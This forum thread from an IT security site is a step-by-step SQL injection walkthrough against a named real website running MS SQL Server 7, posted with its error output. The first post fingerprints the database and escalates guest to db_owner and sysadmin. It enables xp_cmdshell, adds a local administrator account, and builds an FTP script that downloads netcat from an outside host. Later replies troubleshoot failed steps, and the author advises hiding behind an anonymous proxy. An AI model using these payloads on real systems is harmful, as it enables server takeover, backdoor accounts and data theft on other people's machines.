Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 8, 2020
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 645
Members: 0
Total: 645
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> DO u think u know everything about sql injection heh?
Post new topic  Reply to topic View previous topic :: View next topic 
DO u think u know everything about sql injection heh?
PostPosted: Mon Dec 27, 2004 6:53 pm Reply with quote
r0ot
Regular user
Regular user
 
Joined: Jul 18, 2004
Posts: 15




Sorry i was missing almost a year from here.. but im back..


SQL INJECTION GATHERED FROM MASTERVN
REVISION 0.1
RELEASE A

EXAMPLE TO USE:
http://www.nhaxinh.com.vn/FullStory.asp?id=1

Exploiting the hole:
http://www.nhaxinh.com.vn/FullStory.asp?id=1'

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840\




VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--

Code:

[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright ? 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840



SERVER NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840



DATABASE NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840



USER
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,system_user)--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840



OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp)
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840



GUEST = DB_OWNER :DDD
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--

Code:

   No result expected, normal page loading
   Enable us to do sum nice stuff like xp_regwrite e xp_cmdshell



ADDIN TO "BUILTIN\ADMINISTRATORS"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--

and then

http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --

ENABLE OPENROWSET/OLEDB
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840


http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'



ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')

!!PAY ATTETION TO THE SERVER= PARAMETER

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840


if dun work try:
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--



NOW SCRIPT KIDDIES


http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == ?%?)

Code:


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840


C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
 203.162.7.70 == panvietnam.com



http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")

Code:

C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye



UPLOAD NETCAT L?N
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")

Code:

echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f



http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840



Enjoy and happy sql injection guys

_________________
View user's profile Send private message
PostPosted: Mon Dec 27, 2004 9:18 pm Reply with quote
Postal
Regular user
Regular user
 
Joined: Dec 24, 2004
Posts: 5
Location: Latvija




Nice to see you back! Razz

And thanks for this Exclamation

_________________
Born to learn!!!
View user's profile Send private message Yahoo Messenger MSN Messenger ICQ Number
PostPosted: Mon Dec 27, 2004 10:43 pm Reply with quote
any2000
Active user
Active user
 
Joined: Dec 02, 2004
Posts: 26




very very thanks for this Very Happy
View user's profile Send private message
PostPosted: Mon Dec 27, 2004 11:44 pm Reply with quote
r0ot
Regular user
Regular user
 
Joined: Jul 18, 2004
Posts: 15




heheh its nice to come back again.. i spent hole year studing a lot and more important improving my sql admin / dev skills, as you can see above i got much to learn... :/ duh

Comments bout the code, variations of it, etc are appreciated.


Regards

_________________
View user's profile Send private message
PostPosted: Wed Dec 29, 2004 5:15 pm Reply with quote
ReFleX
Active user
Active user
 
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




Hi!, a very good job, I were trying it but i get this error when I execute the last injections
Code:

[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'BUILTIN\Administrators'.


Somebody know why coould this be??
View user's profile Send private message Visit poster's website
PostPosted: Thu Dec 30, 2004 11:51 am Reply with quote
r0ot
Regular user
Regular user
 
Joined: Jul 18, 2004
Posts: 15




sum of the begginning queries dun worked out, so u couldnt add a user to the users... :/ bad..try to review the queries and re-exec it, remember always try to use a good anom proxy

_________________
View user's profile Send private message
PostPosted: Sun Feb 13, 2005 11:05 am Reply with quote
dairy123
Beginner
Beginner
 
Joined: Feb 13, 2005
Posts: 4




that was an extremely cool tut - so much thanks r00t.
just in time as i was losing sleep tryin to figure out which sys tables, sps and xps to use Laughing you saved my so many nights !!

looks like i am getting the same message
Login failed for user 'BUILTIN\Administrators'.

the sql admin seems to be a bit knowledgable - disabled select on the password column of sysxlogins Sad
any thoughts i can elevate the user's privileges?
thnx much
View user's profile Send private message
PostPosted: Tue Nov 01, 2005 7:13 am Reply with quote
linzi
Beginner
Beginner
 
Joined: Nov 01, 2005
Posts: 4




very good,i hv learn more sql injection skill from urs
View user's profile Send private message Visit poster's website MSN Messenger
PostPosted: Thu Dec 08, 2005 11:46 am Reply with quote
goblin
Regular user
Regular user
 
Joined: Nov 03, 2005
Posts: 8




thx, you have a job! i am learning it now .so if someone want to injection like that ,you must master odbc
View user's profile Send private message ICQ Number
Re: DO u think u know everything about sql injection heh?
PostPosted: Thu Dec 08, 2005 11:47 am Reply with quote
goblin
Regular user
Regular user
 
Joined: Nov 03, 2005
Posts: 8




thx, you have a job! i am learning it now .so if someone want to injection like that ,you must master odbc
View user's profile Send private message ICQ Number
PostPosted: Tue Dec 20, 2005 9:22 pm Reply with quote
vcore
Regular user
Regular user
 
Joined: Jun 28, 2005
Posts: 13




Thank you. Two questions:
What's the diference beetwen AND and & Question
and When i put 1 and 1=convert(int,@@version)-- i have a "type mismatch"
(generally Cint), how should I fix this Question
Sorry for my englisg Crying or Very sad
View user's profile Send private message Visit poster's website
DO u think u know everything about sql injection heh?
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.067 Seconds